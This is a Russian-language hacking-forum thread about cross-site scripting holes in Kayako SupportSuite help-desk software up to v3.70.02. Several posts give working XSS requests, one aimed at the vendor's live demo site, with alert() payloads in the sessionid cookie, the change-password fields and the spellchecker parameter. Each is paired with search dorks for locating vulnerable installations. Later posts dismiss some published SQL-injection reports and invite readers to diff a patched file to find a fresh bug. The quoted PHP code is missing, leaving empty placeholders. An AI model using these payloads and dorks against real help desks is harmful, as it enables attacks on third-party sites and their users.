![]() |
Kayako SupportSuite
Продукт: Kayako SupportSuite <= v3.70.02 Active XSS
Офф сайт: www.kayako.com Зависимости: Нет Уязвимые файлы: /modules/livesupport/visitor_htmlcode.php Уязвимый кусок кода: Файл /modules/livesupport/visitor_updatefootprint.php: PHP код:
Файл functions.php: PHP код:
PHP код:
Exploit: http://demo.kayako.com/supportsuite/visitor/index.php?_m=livesupport&_a=updatefootprint&sessio nid=%22;alert('hehehe');//&isfirsttime=1 sessionid запишется в кукисы и будет инжектится, при посещении Kayako SupportSuite, в: PHP код:
Dork: "powered by Kayako SupportSuite" "Help Desk Software by Kayako SupportSuite" |
Эх, вот бы инъекцию в нем или инклуд, но прошерстил весь код - явного ничего нет.
Есть правда инклуд в includes\functions_imc.php, но как я понял, этот файл вообще не используется. Ждем 4ку, может там в связи с большим кол-вом нововведений найдется что-либо. |
Продукт: Kayako SupportSuite <= v3.70.02 Passive XSS
Офф сайт: www.kayako.com Зависимости: Нет Уязвимые файлы: /modules/core/client_changepassword.php Уязвимый кусок кода: Файл /modules/core/client_changepassword.php: PHP код:
http://localhost/kayako5/index.php?_m=core&_a=changepassword Post: oldpassword="><script>alert()</script><b&newpassword="><script>alert()</script><b&newpasswordc="><script>alert()</script><b Dork: "powered by Kayako SupportSuite" "Help Desk Software by Kayako SupportSuite" |
Продукт: Kayako SupportSuite <= v3.70.02 Passive XSS
Офф сайт: www.kayako.com Зависимости: Нет Уязвимые файлы: /includes/Spellcheck/spellchecker.php Уязвимый кусок кода: Файл /includes/Spellcheck/spellchecker.php: PHP код:
http://localhost/kayako5/includes/Spellcheck/spellchecker.php Post: textinputs[</script><script>alert(/hehe/);</script><script ]=asddas Dork: "powered by Kayako SupportSuite" "Help Desk Software by Kayako SupportSuite" |
http://www.exploit-db.com/exploits/14392/
http://www.packetstormsecurity.org/1...t37002-sql.txt http://cve.mitre.org/cgi-bin/cvename...=CVE-2010-2911 http://osvdb.org/show/osvdb/66744 Нереал! Файл /modules/news/client_news.php: PHP код:
|
Может просто silent update? Ты каяку для тестов где брал?
|
Нет, это сразу была чушь. На securityfocus даже висело, что "вендор отрицает наличие данной уязвимости".
|
Код имеет такой вид, если не ошибаюсь, уже с версии 3.30.x. Последняя, паблик, слепая скуля была найдена GulfTech Research And Development, больше ничего нету. Даже xss-ки из этой темы 0дей пока :D
ps Насчёт лажовых сплоитов, особенно на inject0r.com, это не в первый раз замечаю, видимо это круто когда твой бред публикуют, надо будет как нибудь тоже запостить. //upd Ещё один fail Kayako eSupport (functions.php) v3.70.02 SQL Injection Vulnerability http://www.exploit-db.com/exploits/14404/ Незнаю причём здесь functions.php с downloads и _a, в движке, вообще в запрос к бд не попадает. Делаем выводы :) |
Вышла 4-ая версия. Переименовали продукты:
SupportSuite is now Kayako Fusion. LiveResponse is now Kayako Engage. eSupport is now Kayako Resolve. На сайте появился free trial. |
Сегодня вышло обновление в четвертой ветке (4.01.179), закрывающее какую-то серьезную дырку в версиях 4.01.174, 4.01.175 and 4.01.176.
Адвайзори: http://wiki.kayako.com/display/DOCS/4.01.179 Файл, в котором бага: __swift/library/Controllers/class.Controller_api.php У кого есть доступ к старой версии файла и новой, может поискать багу. |
Часовой пояс GMT +3, время: 14:37. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot